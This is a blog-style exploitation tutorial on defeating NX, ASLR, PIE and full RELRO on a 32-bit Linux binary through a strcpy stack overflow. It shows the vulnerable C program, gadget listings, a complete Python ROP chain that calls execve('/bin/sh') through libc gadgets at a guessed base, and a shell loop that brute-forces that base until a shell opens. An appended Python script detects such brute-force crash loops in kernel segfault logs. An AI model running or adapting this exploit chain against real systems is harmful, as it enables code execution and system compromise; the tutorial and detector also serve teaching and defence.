Make ROP with brute force, bypass NX, ASLR, PIE, RELRO

Simple binary vuln:

[jonathan@Archlinux rop-bf]$ cat main.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char buff[32];

    /* 32-byte stack buffer, argv[1] copied with no length check */
    strcpy(buff, argv[1]);
    return (0);
}

Compiled with "gcc -o main main.c -pie"

PIE: enabled
ASLR: enabled
NX: enabled
RELRO: full

Search for gadgets with ROPgadget:

[jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g
Gadgets information
============================================================
0x000003e6: pop %edi | ret
0x00000405: add $0x08,%esp | pop %ebx | ret
0x00000408: pop %ebx | ret
0x00000492: mov (%esp),%ebx | ret
0x0000051c: pop %ebx | pop %esi | pop %ebp | ret
0x0000051e: pop %ebp | ret
0x0000054f: call *%eax
0x00000551: add $0x14,%esp | pop %ebx | pop %ebp | ret
0x00000554: pop %ebx | pop %ebp | ret
0x00000595: mov $0x81ffffff,%esi | ret
0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
Unique gadgets found: 11
Fuck, just 11 gadgets found. :/

So we search for gadgets in /lib/libc.so.6 instead and brute-force the libc base address.
Exploit:

[jonathan@Archlinux rop-bf]$ cat exploit.py
#!/usr/bin/python2
from struct import pack

# guessed libc base; wrong guesses crash the target, the loop below retries
base_addr = 0xb770a000

p = "a" * 44  # fill the 32-byte buffer and saved registers up to the return address

# execve /bin/sh generated by RopGadget v3.3
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020) # @ .data
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
p += "/bin"
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
p += "//sh"
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020) # @ .data
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", base_addr + 0x00178020) # @ .data
p += pack("<I", base_addr + 0x00001a9e) # pop %edx | ret
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x0002dc45) # int $0x80

print p
OK, let's brute-force:

[jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
[...]
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
sh-4.2$
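The crash loop above is also what a defender gets to see: every wrong guess of the libc base is a fresh SIGSEGV in the kernel log. As an added example (not from the original paste), this Python 3 script parses dmesg-style segfault lines and flags a program that keeps crashing in new processes at different addresses; the log lines are constructed samples and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Matches the kernel's x86 "segfault at ... ip ... sp ... error N [in obj[base+size]]"
# message; the trailing "in ..." part is absent when ip points into no mapping.
SEGV_RE = re.compile(
    r"(?P<comm>[^\s\[]+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+)"
    r"(?: in (?P<obj>[^\s\[]+)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\])?"
)

def parse_segfaults(lines):
    """Yield one dict per segfault line; lines that are not segfaults are skipped."""
    for line in lines:
        m = SEGV_RE.search(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["pid"] = int(ev["pid"])
        for key in ("addr", "ip", "sp", "base", "size"):
            ev[key] = int(ev[key], 16) if ev[key] is not None else None
        yield ev

def find_bruteforce(lines, min_crashes=5, min_pids=3):
    """Flag programs that crashed repeatedly in fresh processes, faulting on a
    different page each time: the trail a base-address guessing loop leaves when
    every wrong guess is a new SIGSEGV. Thresholds are assumed, tune per host."""
    stats = defaultdict(lambda: {"crashes": 0, "pids": set(), "pages": set()})
    for ev in parse_segfaults(lines):
        s = stats[ev["comm"]]
        s["crashes"] += 1
        s["pids"].add(ev["pid"])
        s["pages"].add(ev["addr"] >> 12)  # page-align: ASLR shifts whole pages
    return {comm: {"crashes": s["crashes"], "pids": len(s["pids"]),
                   "fault_pages": len(s["pages"])}
            for comm, s in stats.items()
            if s["crashes"] >= min_crashes and len(s["pids"]) >= min_pids}

SAMPLE_DMESG = [  # constructed sample lines, not output from the original post
    "[ 101.12] main[4120]: segfault at b76f2c1f ip b76f2c1f sp bfc3e1d0 error 14",
    "[ 101.13] main[4121]: segfault at b75a0c1f ip b75a0c1f sp bf9a02d0 error 14",
    "[ 101.14] main[4122]: segfault at 42424242 ip 42424242 sp bfd1c320 error 14",
    "[ 101.15] main[4123]: segfault at b7702bb0 ip b7702bb0 sp bfe60b10 error 14 "
    "in libc.so.6[b76e0000+1a1000]",
    "[ 101.16] main[4124]: segfault at b77bcc1f ip b77bcc1f sp bf83e8a0 error 14",
    "[ 101.17] main[4125]: segfault at b7611c1f ip b7611c1f sp bfa7f3b0 error 14",
    "[ 205.00] firefox[2201]: segfault at 0 ip 0807c3a1 sp bff12340 error 4 in firefox[8048000+2000]",
    "[ 206.00] usb 1-1: new high-speed USB device",
]

if __name__ == "__main__":
    for comm, s in find_bruteforce(SAMPLE_DMESG).items():
        print("%s: %d crashes in %d processes, %d distinct fault pages"
              % (comm, s["crashes"], s["pids"], s["fault_pages"]))
```

A single unrelated crash (firefox above) stays below the thresholds, while the restarting target shows up with as many distinct PIDs and fault pages as crashes.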
New feature in a future ROPgadget release: ROPmaker for brute-forcing libc
http://shell-storm.org/project/ROPgadget/

@jonathansalwan